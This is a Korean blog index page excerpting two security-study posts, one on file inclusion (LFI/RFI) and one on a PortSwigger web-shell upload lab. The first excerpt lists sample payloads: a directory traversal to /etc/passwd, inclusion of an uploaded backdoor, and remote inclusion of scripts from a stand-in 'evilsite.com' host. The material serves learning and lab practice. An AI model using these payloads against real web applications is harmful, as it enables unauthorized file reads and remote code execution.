파일업로드취약점2 [10주차] File Inclusion(LFI, RFI) File Iuclusion에서 공격 전 체크할 수 있는 사항으로는 Directory Traversal과 Local File lnclusion, Remote Dile Inclusion이다. Directory Traversal: ?page=../../etc/passwd Local File Inclusion: ?page=../../uploads/my_backdoor.php Remote File Inclusion: ?page=hrrp://evillsite.com/attackserver.php, ?page=http://evilsite.com/XSS.js **윈도우는 역슬래시 리눅스는 / 슬래시이다. RFI(원격 파일 포함, Remote File Inclusion)는 외부 스크립트를 동적으로 참조하는 웹 응용 프로.. 2021. 12. 16. [복습] 파일 업로드 취약점 실습(1) 파일 업로드 취약점 실습 1. 파일 업로드 취약점 아무런 검증이 없는 경우 https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload Lab: Remote code execution via web shell upload | Web Security Academy This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's ... portswigger.net (1) php.. 2021. 12. 14. 이전 1 다음
